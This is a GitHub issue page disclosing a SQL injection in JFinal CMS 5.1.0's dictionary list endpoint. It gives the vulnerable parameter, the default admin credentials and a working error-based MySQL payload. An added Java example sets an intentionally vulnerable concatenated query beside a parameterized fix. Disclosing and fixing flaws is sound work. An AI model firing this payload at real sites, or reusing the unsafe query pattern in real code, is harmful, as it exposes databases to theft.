jflyfox / jfinal_cms

jfinal cms is a feature-rich information and consulting website written in Java. It uses the concise and powerful JFinal as its web framework, beetl as the template engine, MySQL as the database and Bootstrap on the front end. It supports OAuth2 authentication, account registration, password encryption, comments and replies, message notifications, site visit statistics, per-article comment and view counts, reply management and permission management. The back-end modules include: column management, column announcements, column carousel images, article management, reply management, feedback, my albums, album management, image management, collection management, video management, cache refresh, friendly links, visit statistics, contact management, template management, organization management, user management, role management, menu management and data dictionary management.
http://mtg.jflyfox.com/
Apache License 2.0
627 stars 285 forks

SQL injection vulnerability exists in JFinal CMS 5.1.0 #38

Open arongmh opened 2 years ago

arongmh commented 2 years ago

Vulnerability Analysis

The vulnerability appears in lines 23-28 of com.jflyfox.system.dict.DictController.java.


The attrVal parameter is the attr.dict_type parameter passed from the front end, so you can construct a payload to exploit this vulnerability.

Exploit

Maven startup environment.
Vulnerability address: /jfinal_cms/system/dict/list
Administrator login is required. The default account and password are admin:admin123.


Injection parameters: attr.dict_type

payload: ' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+


Sqlmap: (screenshot of sqlmap output)
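Added example, not code from jfinal_cms or from the issue author: it reconstructs the pattern the report describes (the attr.dict_type request value concatenated into the SQL text) next to the parameterized form using JFinal's Db.find(sql, paras). The class name, the sys_dict table and the exact query are assumptions; the controller needs JFinal with an ActiveRecordPlugin-configured datasource to run.

```java
import com.jfinal.core.Controller;
import com.jfinal.plugin.activerecord.Db;
import com.jfinal.plugin.activerecord.Record;
import java.util.List;

// Hypothetical controller; table and query are assumed, not taken from the project.
public class DictListExample extends Controller {

    // Vulnerable shape of the pattern the issue describes: the request value
    // becomes part of the SQL text, so a quote in attr.dict_type closes the
    // string literal and whatever follows is parsed as SQL by MySQL.
    public void listUnsafe() {
        String attrVal = getPara("attr.dict_type");
        String sql = "select * from sys_dict where dict_type = '" + attrVal + "'";
        List<Record> rows = Db.find(sql);
        renderJson(rows);
    }

    // Hardened shape: the value travels as a bind parameter. Db.find(sql, paras)
    // passes it to a PreparedStatement, so the driver sends it as data and the
    // SQL text seen by the server never changes, whatever the value contains.
    public void list() {
        String attrVal = getPara("attr.dict_type");
        String sql = "select * from sys_dict where dict_type = ?";
        List<Record> rows = Db.find(sql, attrVal);
        renderJson(rows);
    }
}
```

The same rule applies to any other "attr.*" value that reaches a query: values bind with `?`, and anything that must become an identifier (a column or sort key) is checked against a fixed allow-list before it is spliced into the statement.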